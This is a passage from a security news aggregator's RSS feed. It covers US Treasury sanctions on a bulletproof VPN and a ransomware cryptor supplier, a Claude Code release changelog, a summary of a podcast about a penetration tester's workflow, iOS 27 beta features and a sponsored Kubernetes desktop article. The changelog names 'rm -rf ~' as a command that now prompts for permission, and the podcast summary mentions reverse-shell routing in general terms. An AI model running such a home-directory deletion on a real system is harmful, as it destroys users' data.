<p data-start="1960" data-end="2207">Authorities also alleged that since 2014, 1VPNS advertised its services on cybercriminal forums while claiming it did not retain user logs or cooperate with law enforcement investigations involving illegal activities conducted through its servers.</p>
<p data-start="2209" data-end="2453">OFAC further stated that Rashevskyi used false identities, including "Maksim Sorin" and "Roman Chabanenko," to purchase infrastructure from providers that may have otherwise declined business because of abuse complaints linked to 1VPNS servers.</p>

<h3 data-section-id="2yk6gt" data-start="2455" data-end="2507"><span role="text"><strong data-start="2458" data-end="2507">Malware Provider Also Added to </strong></span><span role="text"><strong data-start="4299" data-end="4326">Ransomware </strong></span><span role="text"><strong data-start="2458" data-end="2507">Sanctions List</strong></span></h3>
<p data-start="2509" data-end="2663">The Treasury also imposed sanctions on Yegeniy Vladimirovich Silayev, a Belarusian national accused of supplying cryptors to ransomware operators.</p>
<p data-start="2665" data-end="2993">According to OFAC, cryptors are designed to disguise <a href="https://thecyberexpress.com/socgholish-malware-hit-in-operation-endgame/" target="_blank" rel="noopener">malware</a> as legitimate files, making malicious software more difficult for security products to detect or remove. Unlike traditional encryption technologies that protect user data, cryptors are intended to improve the effectiveness and stealth of <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-malware/" title="malware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28956">malware</a> used in cyberattacks.</p>
<p data-start="2995" data-end="3161">The Treasury alleged that Silayev provided encryption and obfuscation services to ransomware groups targeting organizations in the United States and allied countries.</p>

<h3 data-section-id="k0f7tq" data-start="3163" data-end="3224"><span role="text"><strong data-start="3166" data-end="3224">International Action Against Cybercrime Infrastructure</strong></span></h3>
<p data-start="3226" data-end="3440">The sanctions were announced in coordination with the United Kingdom's Foreign, Commonwealth &amp; Development Office, which also imposed sanctions against cybercriminals and individuals accused of enabling <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/" target="_blank" rel="noopener" title="cybercrime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28955">cybercrime</a>.</p>
<p data-start="3442" data-end="3645">The <a class="wpil_keyword_link" href="https://cyble.com/announcement/" target="_blank" rel="noopener" title="announcement" data-wpil-keyword-link="linked" data-wpil-monitor-id="28958">announcement</a> follows a May 2026 operation by European law enforcement authorities that dismantled 1VPNS's website and supporting infrastructure with assistance from the FBI's Boston Field Office.</p>
<p data-start="3647" data-end="3843">The FBI has also released a <a href="https://thecyberexpress.com/drdo-advisory-to-employees-cybersecurity/" target="_blank" rel="noopener">cybersecurity advisory </a>detailing the tactics, techniques, and procedures associated with 1VPNS to help organizations identify and defend against ransomware attacks.</p>

<h3 data-section-id="1lzao4f" data-start="3845" data-end="3883"><span role="text"><strong data-start="3848" data-end="3883">Treasury Cites Executive Orders</strong></span></h3>
<p data-start="3885" data-end="4068">The designations were issued under OFAC authorities pursuant to Executive Order 13694, as amended, along with President Donald Trump's Executive Order 14390, signed in March 2026.</p>
<p data-start="4070" data-end="4294">According to the Treasury, the order directs U.S. government agencies to strengthen protections against foreign actors involved in cybercrime, cyber-enabled <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="28957">fraud</a>, extortion, and related criminal schemes targeting Americans.</p>

<h3 data-section-id="1rnnow1" data-start="4296" data-end="4326"><span role="text"><strong data-start="4299" data-end="4326">What the Sanctions Mean</strong></span></h3>
<p data-start="4328" data-end="4532">Under the sanctions, all property and interests belonging to the designated individuals and entity that are within the United States or controlled by U.S. persons are blocked and must be reported to OFAC.</p>
<p data-start="4534" data-end="4758">The restrictions also extend to entities owned 50% or more by designated persons. Unless authorized by OFAC, U.S. persons are generally prohibited from engaging in transactions involving blocked individuals or organizations.</p>
<p data-start="4760" data-end="5053">The Treasury said violations of U.S. sanctions may result in civil or criminal penalties for both U.S. and foreign persons. It also warned that financial institutions and other organizations could face sanctions exposure if they engage in prohibited transactions involving designated entities.</p>
<p data-start="5055" data-end="5296">The latest ransomware sanctions reflect continuing efforts by U.S. authorities and international partners to target the infrastructure and services that enable ransomware operators rather than focusing solely on the attackers themselves.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.208]]></title>
<description><![CDATA[What's changed

Added screen reader mode: opt-in plain-text rendering for screen reader users. Run claude --ax-screen-reader, set CLAUDE_AX_SCREEN_READER=1, or add "axScreenReader": true to settings.
Added vimInsertModeRemaps setting: map two-key insert-mode sequences like jj to Escape in vim mod...]]></description>
<link>https://tsecurity.de/de/3666678/downloads/v21208/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666678/downloads/v21208/</guid>
<pubDate>Tue, 14 Jul 2026 03:16:40 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Added screen reader mode: opt-in plain-text rendering for screen reader users. Run <code>claude --ax-screen-reader</code>, set CLAUDE_AX_SCREEN_READER=1, or add "axScreenReader": true to settings.</li>
<li>Added <code>vimInsertModeRemaps</code> setting: map two-key insert-mode sequences like <code>jj</code> to Escape in vim mode</li>
<li>Added <code>CLAUDE_CODE_PROCESS_WRAPPER</code>: agent view and the background service now honor a corporate launcher by running every Claude Code self-spawn through a required wrapper executable</li>
<li>Added mouse-click support for multi-select menus and "Other" input rows in fullscreen mode</li>
<li>Fixed fast mode staying off after switching back to a model that supports it — it now restores automatically when enabled in settings</li>
<li>Fixed replies typed to a background agent being lost when delivery fails — the text is now saved and delivered when the session restarts</li>
<li>Fixed background-session attach failing permanently ("Couldn't start the background daemon") after an update replaced the binary a running <code>claude agents</code> process was launched from</li>
<li>Fixed the context window (and auto-compact indicator) briefly resetting to 200k after the CLI auto-updates, causing a false "100% context used" when resuming long-context sessions</li>
<li>Fixed supervised and background sessions crashing when a server closed an HTTP/2 connection with a GOAWAY while requests were in flight</li>
<li>Fixed truncated stream-json/JSON output and missing result message when piping large responses from <code>claude -p</code></li>
<li>Fixed <code>CLAUDE_CODE_MAX_OUTPUT_TOKENS</code> and similar env vars silently using the mantissa of scientific-notation values (<code>1e6</code> became <code>1</code>)</li>
<li>Fixed very large markdown tables stalling rendering or using excessive memory; tables over 200 rows show the first 200 with a "… N more rows" notice</li>
<li>Fixed the Edit tool failing on files modified after reading when the target text still matches uniquely</li>
<li>Fixed Read reporting empty files as "shorter than offset", Grep silently returning "No files found" for invalid regex patterns, Grep count mode under-reporting totals when paginated, and Glob crashing with an unclear error when the pattern, path, or working directory contained a null byte</li>
<li>Fixed <code>apiKeyHelper</code> script failures being hidden behind a generic 401 after ~10 silent retries; the script's own error is now shown within 3 attempts</li>
<li>Fixed Bedrock streaming requests failing with a misleading "Truncated event message received" when a gateway transforms the response — the error now names the content-type and points at the proxy</li>
<li>Fixed <code>/upgrade</code> showing a login flow instead of the upgrade URL when the browser fails to open</li>
<li>Fixed stream-json input killing the session on blank CRLF or whitespace-only lines from Windows-style SDK hosts</li>
<li>Fixed headless stream-json sessions hanging permanently when a <code>control_request</code> carried a non-string <code>set_model</code> payload; the CLI now answers with an error response</li>
<li>Fixed repeated "No completion record was found" notices on session resume — orphaned background tasks now collapse into a single summary</li>
<li>Fixed Remote Control clients attaching to a terminal-hosted session not seeing background agents and workflow progress until a task started or stopped</li>
<li>Fixed the Agent tool launching with no tools when a subagent's <code>tools</code> list resolves to nothing — it now returns a clear error naming the unrecognized entries</li>
<li>Fixed <code>/usage</code> showing stale cached bars over fresher data, and <code>/mcp</code> not reclassifying placeholder servers after config edits</li>
<li>Fixed "Change directory" in SDK hosts (e.g. Claude Desktop) failing with "A turn is in progress" on idle sessions that have a running background task</li>
<li>Fixed the workflow save dialog showing <code>~/.claude/workflows/</code> instead of the <code>CLAUDE_CONFIG_DIR</code> location for user-scope saves</li>
<li>Fixed <code>/release-notes</code> adding the viewed notes to the model's context — "Show all" previously injected the entire changelog into every subsequent request</li>
<li>Fixed a memory leak in the agent view where pasted images were retained for the screen's lifetime after sending peek replies</li>
<li>Fixed SDK sessions losing agents defined via the initialize request when a plugin refresh ran before the client attached</li>
<li>Fixed several memory leaks in long sessions: MCP stdio server stderr accumulating up to 64 MB per server, LSP documents staying open indefinitely (now LRU with 50-doc cap), async hook output retained after backgrounding, and unbounded growth in headless/SDK sessions from large tool-result payloads</li>
<li>Fixed a memory blowup when reading files with extremely long single lines using offset/limit — the read now returns a clean error instead of loading the whole line</li>
<li>Fixed multi-second per-turn slowdowns in sessions with many permission deny/ask rules — rule matchers are now compiled once and cached</li>
<li>Improved input responsiveness while agent task lists update — task updates no longer re-render the entire UI</li>
<li>Reduced per-tool-call CPU overhead in print/SDK sessions with many MCP tools by caching tool-pool assembly (up to 7x faster tool rounds at high tool counts)</li>
<li>Reduced memory usage by bounding the file edit read cache to 16 MB instead of pinning up to 1,000 full files</li>
<li>Reduced session transcript size (up to 79x in edit-heavy sessions) and bounded checkpoint disk usage by pruning superseded file-history backups</li>
<li>Reduced memory usage when resuming sessions with background agents or forks spawned from large conversations</li>
<li>Completed background agents now stay listed in <code>/tasks</code> until cleanup instead of vanishing the moment they finish</li>
<li>Attaching to a stopped background agent now shows its transcript immediately while the session warms up, instead of a blank "Session is starting" screen</li>
<li>Background sessions: an older daemon no longer silently restarts workers spawned by a newer version onto the older binary</li>
<li>Agent view: Ctrl+X now deletes renamed-branch worktrees, never destroys unpushed commits, keeps the session row when a worktree is kept, and reused worktree names reset to the current base</li>
<li>Catastrophic removals (e.g. <code>rm -rf ~</code>) in commands containing <code>$(…)</code>/backticks/<code>&lt;(…)</code> now prompt in <code>--dangerously-skip-permissions</code> and auto mode, matching the plain form</li>
<li><code>/install-github-app</code> and the <code>/mcp</code> settings menu no longer open in background sessions</li>
<li>MCP servers configured with an empty URL now show as "not configured" in <code>/mcp</code> instead of a config error</li>
<li><code>/usage</code> now shows your last-known usage bars with an "as of" note when the usage endpoint is rate-limited, instead of an error screen</li>
<li>Fixed Bedrock auth failing with "Session token not found or invalid" for AWS SSO profiles whose sso_region differs from the Bedrock region (2.1.207 regression)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4682: Behind the Keyboard: A Cybersecurity Operator’s Real-World Workflow]]></title>
<description><![CDATA[This show has been flagged as Explicit by the host.










SUMMARY


The presenter outlines a practical cybersecurity workflow, covering ergonomic setups, browser isolation, virtual machine troubleshooting, AI-assisted scripting, and network tunneling methods utilized during active securi...]]></description>
<link>https://tsecurity.de/de/3666605/podcasts/hpr4682-behind-the-keyboard-a-cybersecurity-operators-real-world-workflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666605/podcasts/hpr4682-behind-the-keyboard-a-cybersecurity-operators-real-world-workflow/</guid>
<pubDate>Tue, 14 Jul 2026 02:03:31 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Explicit by the host.</p>

<h1>

</h1>

<h1>

</h1>

<h1>
SUMMARY</h1>

<p>
The presenter outlines a practical cybersecurity workflow, covering ergonomic setups, browser isolation, virtual machine troubleshooting, AI-assisted scripting, and network tunneling methods utilized during active security assessments.</p>

<h1>
ONE-SENTENCE TAKEAWAY</h1>

<p>
Isolate browser environments, utilize automation scripts, and verify network paths before starting security tests to avoid workflow interruptions.</p>

<h1>
TOOLS</h1>

<ul>

<li>

<strong>
Talon Voice</strong>
 – Open-source voice recognition software enabling hands-free computer control and command execution.</li>

<li>

<strong>
Obsidian</strong>
 – Local-first markdown note-taking application supporting secure, AI-friendly knowledge management.</li>

<li>

<strong>
AutoHotkey</strong>
 – Windows scripting utility for creating custom macros and remapping keyboard inputs.</li>

<li>

<strong>
Chrome Debug Commands</strong>
 – Browser developer tools allowing direct inspection of extensions, cookies, and storage.</li>

<li>

<strong>
Whisper Diarization</strong>
 – Audio processing script that separates speaker tracks and converts recordings to searchable text.</li>

<li>

<strong>
Hyper-V / WSL</strong>
 – Microsoft virtualization platforms enabling isolated guest environments and Linux subsystem integration.</li>

<li>

<strong>
OpenConnect / OpenVPN</strong>
 – Command-line tunneling clients used for establishing secure, split-tunnel network connections.</li>

<li>

<strong>
Jamboree Framework</strong>
 – Portable PowerShell environment that dynamically provisions development tools without altering system paths.</li>

<li>

<strong>
MOBA Portable</strong>
 – Feature-rich terminal emulator supporting static/dynamic tunnels, auto-reconnect, and embedded X-server capabilities.</li>

<li>

<strong>
Nmap</strong>
 – Network discovery and security auditing tool utilized for comprehensive port scanning and service detection.</li>

</ul>

<h2>
00:00:00 Ergonomic Workspace Configuration</h2>

<p>
Configures physical workstation elements to reduce strain during extended testing sessions. Proper alignment prevents repetitive stress injuries while maintaining focus on technical tasks.</p>

<ul>

<li>

<strong>
Monitor Positioning</strong>
 – Displays should align with eye level to maintain neutral neck posture; the speaker notes their curved 49-inch screen sits slightly high due to chair adjustments.</li>

<li>

<strong>
Split Keyboard Layout</strong>
 – Utilizes a Freestyle 2 mechanical keyboard, allowing natural shoulder-width arm placement and reducing wrist deviation during prolonged typing.</li>

<li>

<strong>
Postural Adaptation</strong>
 – Acknowledges that ergonomic equipment requires matching body alignment; elbow rests should sit between hip and shoulder height for optimal leverage.</li>

</ul>

<h2>
01:45:00 Voice Control &amp; Note Synchronization</h2>

<p>
Utilizes auditory input methods and localized knowledge bases to streamline documentation workflows. Separating secure work notes from casual observations prevents data contamination.</p>

<ul>

<li>

<strong>
Talon Voice Integration</strong>
 – Runs continuously to handle navigation, text entry, and application switching without manual keyboard interaction.</li>

<li>

<strong>
Obsidian Migration</strong>
 – Transitions from cloud-based keep apps to local markdown files, enabling direct querying by local AI models while maintaining offline accessibility.</li>

<li>

<strong>
Note Categorization</strong>
 – Divides information into secure work records and insecure personal logs, ensuring clean data pipelines for future retrieval and analysis.</li>

</ul>

<h2>
03:50:00 Browser Extension Management &amp; Security Isolation</h2>

<p>
Separates web browsing activities from primary work processes to minimize attack surfaces. Running dedicated user profiles prevents plugin conflicts and credential leakage.</p>

<ul>

<li>

<strong>
Jailed User Accounts</strong>
 – Creates restricted system profiles that only launch the browser, isolating extensions from core workstation operations.</li>

<li>

<strong>
Shared Folder Synchronization</strong>
 – Establishes a single directory path bridging work and browsing users, allowing seamless file transfers without cross-contamination.</li>

<li>

<strong>
Extension Audit Process</strong>
 – Leverages Chrome debug commands to enumerate installed plugins, verifying functionality before deployment on target networks.</li>

</ul>

<h2>
06:15:00 Training Optimization &amp; Audio Processing</h2>

<p>
Accelerates mandatory compliance viewing through speed manipulation and automated transcription. Converting video content into searchable text enables rapid information retrieval.</p>

<ul>

<li>

<strong>
Global Speed Control</strong>
 – Increases playback rates up to sixteen times normal speed, drastically reducing time spent on repetitive corporate training modules.</li>

<li>

<strong>
Whisper Diarization Pipeline</strong>
 – Downloads video tracks, separates speaker voices, and generates timestamped transcripts for quick reference during assessments.</li>

<li>

<strong>
Download Management</strong>
 – Employs multi-threaded swarm downloaders and classic turbo managers to handle bulk media retrieval without interrupting active workflows.</li>

</ul>

<h2>
10:40:00 Virtualization &amp; Network Tunneling Protocols</h2>

<p>
Establishes isolated testing environments using Windows virtual machines while managing connectivity constraints. Proper session handling prevents unexpected disconnections during remote engagements.</p>

<ul>

<li>

<strong>
Enhanced Session Mode</strong>
 – A Hyper-V feature providing higher resolution and shared clipboard functionality; disabling it is required before initiating certain VPN clients to avoid routing conflicts.</li>

<li>

<strong>
Split Tunneling Mechanics</strong>
 – Routes specific traffic through the virtual network while keeping local resources accessible, preventing complete internet loss during connection tests.</li>

<li>

<strong>
Certificate Verification</strong>
 – Identifies self-signed SSL mismatches early in the process, documenting them as preliminary findings before proceeding with authentication steps.</li>

</ul>

<h2>
15:30:00 Macro Automation &amp; Input Remapping</h2>

<p>
Remaps frequently used keyboard shortcuts to reduce physical strain and accelerate command execution. Running scripts with elevated privileges ensures reliable input registration across virtual environments.</p>

<ul>

<li>

<strong>
Caps Lock Repurposing</strong>
 – Converts the caps lock key into a primary modifier, assigning copy/paste functions to adjacent letters for faster workflow navigation.</li>

<li>

<strong>
Physical Typing Macros</strong>
 – Simulates keystrokes with deliberate delays, allowing seamless data entry into restricted VM consoles that block standard clipboard operations.</li>

<li>

<strong>
Administrator Execution Requirement</strong>
 – Highlights that macro scripts must run with elevated privileges to successfully inject inputs across different desktop sessions.</li>

</ul>

<h2>
20:15:00 Portable Development Environments &amp; Python Management</h2>

<p>
Deploys lightweight scripting frameworks that dynamically provision necessary tools without modifying host configurations. Verifying package contents prevents dependency conflicts during testing.</p>

<ul>

<li>

<strong>
Jamboree Framework</strong>
 – A PowerShell-driven utility that downloads and configures development stacks on demand, resetting environment variables to maintain system cleanliness.</li>

<li>

<strong>
NuGet Package Filtering</strong>
 – Queries Microsoft's repository API to retrieve specific Python versions, ensuring compatibility with legacy tunneling scripts.</li>

<li>

<strong>
Binary Verification Process</strong>
 – Checks extracted archives for bundled <code>
pip.exe</code>
 or <code>
pip3.exe</code>
 executables, eliminating manual module installation steps during rapid deployments.</li>

</ul>

<h2>
28:40:00 AI-Assisted Scripting &amp; Debugging Workflows</h2>

<p>
Generates and refines PowerShell functions through iterative conversational prompts. Validating AI output against actual system behavior prevents silent configuration errors.</p>

<ul>

<li>

<strong>
Vibe Coding Approach</strong>
 – Relies on continuous feedback loops with language models to draft, minimize, and debug automation scripts in real-time.</li>

<li>

<strong>
Parameter Standardization</strong>
 – Enforces strict formatting rules for PowerShell commands, avoiding hardcoded paths and ensuring cross-environment compatibility.</li>

<li>

<strong>
Temporary Storage Management</strong>
 – Monitors extraction directories to prevent disk saturation, redirecting large package downloads away from constrained system partitions.</li>

</ul>

<h2>
35:10:00 Terminal Emulation &amp; Advanced Tunneling Strategies</h2>

<p>
Facilitates complex network routing through dedicated terminal applications. Configuring dynamic and static tunnels enables reliable reverse connections for remote assessments.</p>

<ul>

<li>

<strong>
MOBA Portable Configuration</strong>
 – Utilizes an INI-based tunnel manager that automatically maintains connections across changing IP addresses or Wi-Fi networks.</li>

<li>

<strong>
Reverse Shell Routing</strong>
 – Establishes outbound channels back to the tester, then proxies all subsequent traffic through those connections for consistent monitoring.</li>

<li>

<strong>
Proxy Chain Integration</strong>
 – Forces non-proxy-aware applications to route through Burp Suite or custom interceptors using Windows utility wrappers like Priboxy.</li>

</ul>

<h2>
42:30:00 Final Connectivity Testing &amp; Engagement Wrap-Up</h2>

<p>
Executes comprehensive port scans to verify target accessibility before documenting findings. Acknowledging workflow detours ensures realistic time management during active engagements.</p>

<ul>

<li>

<strong>
Nmap Verification</strong>
 – Runs full-port scans with verbose output to confirm host responsiveness and identify open services prior to credential testing.</li>

<li>

<strong>
Connection Refusal Documentation</strong>
 – Captures screenshot evidence of failed routing attempts, providing clear proof of network restrictions for client reporting.</li>

<li>

<strong>
Workflow Reflection</strong>
 – Recognizes that exploratory debugging adds value but requires time boundaries; balancing thoroughness with engagement scope maintains professional efficiency.</li>

</ul>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4682/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[iOS 27 Public Beta Is Now Available: Here’s Everything New]]></title>
<description><![CDATA[Apple has released the first iOS 27 public beta, giving iPhone users an early look at Siri AI, faster system performance, refined Liquid Glass visuals, and several useful app upgrades. The beta is free to install, although users should expect bugs, battery drain, and occasional app compatibility ...]]></description>
<link>https://tsecurity.de/de/3666598/ios-mac-os/ios-27-public-beta-is-now-available-heres-everything-new/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666598/ios-mac-os/ios-27-public-beta-is-now-available-heres-everything-new/</guid>
<pubDate>Tue, 14 Jul 2026 01:53:56 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has released the first iOS 27 public beta, giving iPhone users an early look at Siri AI, faster system performance, refined Liquid Glass visuals, and several useful app upgrades. The beta is free to install, although users should expect bugs, battery drain, and occasional app compatibility problems.



How to Install the iOS 27 Public Beta



Back up your iPhone through iCloud or a computer before installing the beta. Using a secondary device is safer because returning to iOS 26 can require erasing the iPhone.




Visit the Apple Beta Software Program website.



Sign in using the Apple Account connected to your iPhone.



Accept the program terms and enroll your account.



Open Settings on your iPhone.



Go to General &gt; Software Update &gt; Beta Updates.



Select iOS 27 Public Beta.



Return to the previous screen and tap Update Now.




Your iPhone must have enough available storage, a stable Wi-Fi connection, and sufficient battery power to complete the installation.



Everything New in the iOS 27 Public Beta




Siri AI: Siri now supports more natural conversations, follow-up questions, personal information searches, onscreen awareness, and actions across supported apps. A dedicated Siri app also stores previous conversations. Siri AI requires an iPhone that supports Apple Intelligence.



Visual Intelligence in Camera: Users can point the camera at real-world information and ask Siri for help. The system can identify details, extract information, create calendar events, and perform tasks such as reading a barcode or analysing a meal.



Faster iPhone performance: Apple has improved app launches, AirDrop transfers, photo processing, keyboard loading, unlocking, Home Screen navigation, and system animations. These improvements also apply to older supported models, including the iPhone 11 series.



Liquid Glass controls: iOS 27 refines the Liquid Glass design introduced with iOS 26. A new slider under Settings &gt; Appearance lets users adjust how clear or tinted the interface appears.



Smarter Safari tools: Safari can automatically group tabs and organize bookmarks by topic. It can also watch webpages for changes and help users create extensions through natural-language instructions.



New Photos editing features: The Photos app includes an improved Clean Up tool for removing larger distractions. Extend can generate content beyond the edges of a photo, while Spatial Reframing lets users adjust the apparent camera angle after taking a picture.



Natural-language Shortcuts: Users can describe an automation in everyday language, and the Shortcuts app will build it. Additional instructions can refine the automation without starting again.



Improved password security: The Passwords app can replace some weak or compromised passwords automatically. It can also manage verification codes and show the replacement process through a Live Activity.



Screen Time redesign: Parents receive a clearer activity dashboard, category-based time allowances, and schedules for school days, evenings, and weekends. Children can request permission before visiting certain websites or contacting new people.



More child safety features: Communication Safety can detect and blur sensitive images. iOS 27 expands these protections to include violent or graphic content.



AirPods custom equalizer: Compatible AirPods gain separate controls for low, mid, and high frequencies, giving users more control over how music and other audio sound.



Messages improvements: Large photos and videos can continue sending in the background without delaying newer messages. Group conversations also handle Tapback notifications more clearly.



Better Photos sharing: Shared Albums support full-resolution media, contributions from Windows and Android devices, keywords, star ratings, and customizable slideshows.



Independent alarm volume: Users can change alarm volume without changing the overall system volume.



Larger Home Screen widgets: New extra-large widgets can take up an entire Home Screen page and show more information at once.



Home app upgrades: The Home app adds improved HomeKit Secure Video reliability and support for compatible 4K security cameras.



Better network switching: iPhones can move between Wi-Fi and cellular data more quickly when the current connection becomes weak.




The iOS 27 public beta will receive more updates before the final version arrives later this year. Anyone testing the software can report bugs through the Feedback Assistant app.



If you’ve already installed the update, let us know your experience in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[The desktop infrastructure problem that kubernetes finally solves]]></title>
<description><![CDATA[Presented by Kasm TechnologiesEnterprise infrastructure teams have spent the better part of a decade pushing workloads into Kubernetes. Applications, APIs, batch jobs, data pipelines — if it runs in a container, it belongs in the cluster. The operational benefits are well-established: declarative...]]></description>
<link>https://tsecurity.de/de/3665757/it-nachrichten/the-desktop-infrastructure-problem-that-kubernetes-finally-solves/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665757/it-nachrichten/the-desktop-infrastructure-problem-that-kubernetes-finally-solves/</guid>
<pubDate>Mon, 13 Jul 2026 17:32:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><i>Presented by </i><a href="https://kasm.com/?utm_campaign=46469231-1.19%20Release%20Campaign&amp;utm_source=VentureBeat&amp;utm_medium=Paid%20Article&amp;utm_content=venture_beat_kasm_home_page"><i>Kasm Technologies</i></a></p><hr><p>Enterprise infrastructure teams have spent the better part of a decade pushing workloads into Kubernetes. Applications, APIs, batch jobs, data pipelines — if it runs in a container, it belongs in the cluster. The operational benefits are well-established: declarative configuration, horizontal scaling, self-healing, native integration with CI/CD pipelines and observability tooling. Kubernetes has become the default operating model for production workloads.</p><p>Except for desktops.</p><p>Secure desktop and application delivery — the kind that enterprises depend on for remote work, privileged access, and regulated-industry workflows — has remained stubbornly outside the Kubernetes model. Legacy virtual desktop infrastructure was built in a different era, for a different set of assumptions: pre-allocated VM pools, bespoke management planes, proprietary appliances, and operational tooling that has nothing to do with how modern platform teams work. The result is a split infrastructure reality: a modern, cloud-native application layer on one side, and a manually managed, operationally isolated desktop layer on the other.</p><p>That split is expensive. It means different tooling, different scaling behaviors, different observability approaches, and different operational runbooks. Platform engineers who are proficient in Kubernetes still have to context-switch into an entirely different mental model the moment a desktop infrastructure problem arises.</p><p>The more fundamental issue is that this split is unnecessary. Secure, containerized workspace delivery is a workload that Kubernetes is architecturally well-suited to run. Sessions are containers. Scaling is demand-driven. Configuration should be declarative. The only thing missing was a platform built to take advantage of that alignment.</p><h2>Why the timing is right</h2><p>The appetite for Kubernetes-native workspace delivery has grown significantly as organizations mature their container platform investments. Platform teams that have spent years standardizing on Helm, GitOps workflows, and Kubernetes-native observability are increasingly unwilling to make an exception for desktop infrastructure. The question has shifted from "can we run this on Kubernetes?" to "why isn't this running on Kubernetes already?"</p><p>At the same time, the security case for containerized workspace delivery has become more urgent. Browser-delivered, containerized workspaces provide session isolation that VM-based desktops cannot match — each session is ephemeral, isolated at the container boundary, and terminates cleanly without persistent state. For organizations managing sensitive data, insider risk, or third-party access scenarios, this isolation model is a meaningful security control, not just a deployment convenience.</p><p>The convergence of these two trends — Kubernetes-native infrastructure expectations and containerized session security — creates a clear opportunity for platforms that can address both simultaneously.</p><h2>What Kubernetes-native deployment looks like</h2><p>A Kubernetes-native deployment uses Kubernetes as the control plane for workspace infrastructure — handling orchestration, scaling, and lifecycle management through the same declarative model used across the rest of the platform. Instead of relying on dedicated management appliances or pre-provisioned desktop pools, infrastructure is managed through the same CI/CD, GitOps, observability, and security workflows the platform team already operates. This gives platform teams a consistent operational model rather than maintaining a separate toolset for desktop infrastructure.</p><p><a href="https://kasm.com/solutions/platform?utm_campaign=46469231-1.19%20Release%20Campaign&amp;utm_source=Paid%20Media&amp;utm_medium=VentureBeat&amp;utm_content=venturebeat_kasm_workspaces_platform">Kasm Workspaces, the browser-delivered workspace platform</a>, is purpose-built to use Kubernetes as the control plane for workspace orchestration and delivery. Its deployment model is designed for real enterprise environments — not simplified demos — with production-grade Helm charts that follow Kubernetes conventions, tested upgrade paths between versions, and a standardized backend architecture validated across production deployments. An RDP Gateway component purpose-built for the Kubernetes topology enables Windows and Linux virtual machine access through the same platform.</p><p><b>Key capabilities include:</b></p><ul><li><p>Horizontal session scaling driven by actual demand, orchestrated by Kubernetes — no pre-warmed VM pools required.</p></li><li><p>Declarative configuration through Helm values, enabling GitOps and CI/CD integration for workspace infrastructure.</p></li><li><p>Namespace-level isolation and compatibility with existing RBAC policies, ingress controllers, and secrets management integrations.</p></li><li><p>Metrics export for integration with Prometheus and existing observability stacks.</p></li><li><p>Rolling builds by default, reducing maintenance windows and enabling more predictable version management.</p></li></ul><h2>Real-world applications</h2><p>Regulated-industry remote access. A financial services organization running a Kubernetes-based application platform can deploy Kasm into the same cluster, using the same operational tooling, to deliver isolated browser and application sessions to analysts and advisors. Sessions are ephemeral, network egress is controlled, and the entire deployment is managed through the same GitOps pipeline as their application workloads.</p><p>Contractor and third-party access. Organizations that regularly onboard contractors or external vendors — with the associated privileged access risk — can provision Kasm sessions on Kubernetes that scale up during engagement periods and scale back during low-demand windows. No persistent access. No VPN extension to external parties. Containerized isolation at every session boundary.</p><p>AI/ML development environments. Teams building and running AI models need GPU-enabled development environments with security controls that general-purpose cloud desktops rarely provide. Deploying Kasm on Kubernetes with NVIDIA MiG Multi-Instance GPU support lets platform teams deliver fractional GPU resources into isolated workspace sessions — giving data scientists the compute they need without shared-infrastructure security exposure.</p><h2>The operational shift</h2><p>The practical implication of a Kubernetes-native workspace platform is that platform teams can stop treating workspace infrastructure as a special case. The same engineers who deploy applications can deploy the workspace platform. The same pipelines that manage application configuration can manage workspace configuration. The same dashboards that monitor application health can monitor workspace health.</p><p>That operational consolidation reduces overhead, improves consistency, and eliminates the context-switching cost that has made desktop infrastructure a persistent pain point for cloud-native organizations.</p><p>For organizations still running legacy VDI alongside modern cloud infrastructure, the question is no longer whether a Kubernetes-native alternative exists. It does. The question is when to make the transition.</p><p>Organizations interested in evaluating Kubernetes-native workspace delivery can explore the platform at <a href="https://kasm.com/solutions/platform?utm_campaign=46469231-1.19%20Release%20Campaign&amp;utm_source=Paid%20Media&amp;utm_medium=VentureBeat&amp;utm_content=venturebeat_kasm_workspaces_platform">kasm.com</a> and try out <a href="https://kasm.com/community-edition?utm_campaign=46469231-1.19%20Release%20Campaign&amp;utm_source=VentureBeat&amp;utm_medium=Article&amp;utm_content=venturebeat_community_edition">community edition</a> for yourself. </p><p><i>Daniel Ben-Chitrit is the Chief Product Officer at </i><a href="https://kasm.com/?utm_campaign=46469231-1.19%20Release%20Campaign&amp;utm_source=VentureBeat&amp;utm_medium=Paid%20Article&amp;utm_content=venture_beat_kasm_home_page"><i>Kasm Technologies</i></a><i>.</i></p><hr><p><i>Sponsored articles are content produced by a company that is either paying for the post or has a business relationship with VentureBeat, and they’re always clearly marked. For more information, contact </i><a href="mailto:sales@venturebeat.com"><i><u>sales@venturebeat.com</u></i></a><i>.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Routine maintenance as a failure vector in modern networks]]></title>
<description><![CDATA[Early in my consulting career, I assumed maintenance windows reduced risk. After all, the purpose of planned maintenance is to improve reliability, apply fixes and prevent future outages. That assumption changed after I participated in what should have been a routine infrastructure change.



Eve...]]></description>
<link>https://tsecurity.de/de/3664719/it-security-nachrichten/routine-maintenance-as-a-failure-vector-in-modern-networks/</link>
